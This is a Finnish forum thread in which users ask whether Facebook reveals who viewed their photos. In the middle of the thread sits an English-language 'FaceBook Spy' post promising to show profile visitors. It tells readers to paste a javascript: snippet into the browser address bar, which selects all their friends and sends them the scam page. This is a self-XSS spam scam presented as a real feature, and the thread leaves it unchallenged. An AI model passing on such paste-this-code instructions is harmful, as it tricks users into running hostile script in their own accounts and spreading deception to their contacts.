Face book

• Viestiketjun aloittaja Viestiketjun aloittaja vieras
  • Ensimmäinen viesti Ensimmäinen viesti
Alkuperäinen kirjoittaja jep:
Ei. :D Siellä on semmonen yks sovellus mistä voi jotenkin laittaa ystäväkollaasin, ne toimii ahkeruuskävijälaskurina. Muuten ei nävy. :)

Ai, kyllä mulle tuli tieto että se ja se on katsonut kuviasi, vaikka ei ollut mitään kommentoinutkaan.

No EIKÄ!!! minä oon luullu ettei sitä nää, ja oon katellu vähän kuvia..no kävin vaan avopuolison kaveria kattomassa kun se ihme hyypiö eikä ikinä juttele. No nyt se ajattelee vaikka mitä. Ou nou!

Alkuperäinen kirjoittaja Liidhan:
Kyllä toisille tulee tieto vaikka et kommentoisikaan tai tykkää kuvasta. Sehän riippuu henkilön asetuksista.

Millaiset asetukset voi laittaa, että näkee, jos joku on käynyt katsomassa kuviani? Nyt en ainakaan näe, vaikka tiedän, että moni on kuvia käynyt katsomassa(ovat itse kertoneet) Mutta facebook ei siitä kyllä mitään kommentoinut, että ko. ovat käyneet kuvia katsomassa.

FaceBook Spy is an additional add-ons for facebook that allows facebook users to see and know anyone who has come to his profile. Information will be sorted by day and will appear in your notification box at the right bottom. With FaceBook Spy you can easily identify which user has seen your facebook profile, what time and what day.

FaceBook Spy Installation Guidelines:

1.

First you must became a fan. Click on BECOME A FAN menu at the top.
2.

Then you must suggest FaceBook Spy Fans Page to all of your facebook friends. Go to OUR PAGE and click on SUGGEST TO FRIENDS menu under the profile picture.
3.

Once the page has loaded you should see all of your friends, but they are not selected. At this point you can copy and paste the following code on the url field of your internet browser and then press enter. All of your friends will be selected automatically at a time without wasting your time.
4. javascript:elms=document.getElementById('friends').getElementsByTagName('li');for(var fid in elms){if(typeof elms[fid] === 'object'){fs.click(elms[fid]);}}

Click on SEND INVITATION menu and the invitation will be sent.
5.

Within 24 hours you will receive a link in your inbox to activate your FaceBook Spy. Click on that link and follow the final instructions to activate your FaceBook Spy.
6.

After FaceBook Spy is activated you will receive a notification each time someone visits and see your profile.

FaceBook Spy Team @ 2009

Alkuperäinen kirjoittaja vieras:
Alkuperäinen kirjoittaja Liidhan:
Kyllä toisille tulee tieto vaikka et kommentoisikaan tai tykkää kuvasta. Sehän riippuu henkilön asetuksista.

Millaiset asetukset voi laittaa, että näkee, jos joku on käynyt katsomassa kuviani? Nyt en ainakaan näe, vaikka tiedän, että moni on kuvia käynyt katsomassa(ovat itse kertoneet) Mutta facebook ei siitä kyllä mitään kommentoinut, että ko. ovat käyneet kuvia katsomassa.

Vastaisiko joku??

Alkuperäinen kirjoittaja s:
Alkuperäinen kirjoittaja Ammattilainen:
Alkuperäinen kirjoittaja s:
sinne mihin tulee aina ne että se ja se kommentoi sen tilaa ja se ja se tykkää sen tilasta ym. Myös mulle tuli juuri yks päivä että se ja se katsoi kuviasi.

Valehtelet.

En varmana valehtele!!! Minkähän alan ammattilainen olet??

No, mä oon aina sen alan ammattliainen minkä alan ketjusta on kyse, tietysti, :xmas: En mä nikkiä vaihda jokaista keskustelua varten. Medialukutaitoa kehiin...

Yhteistyössä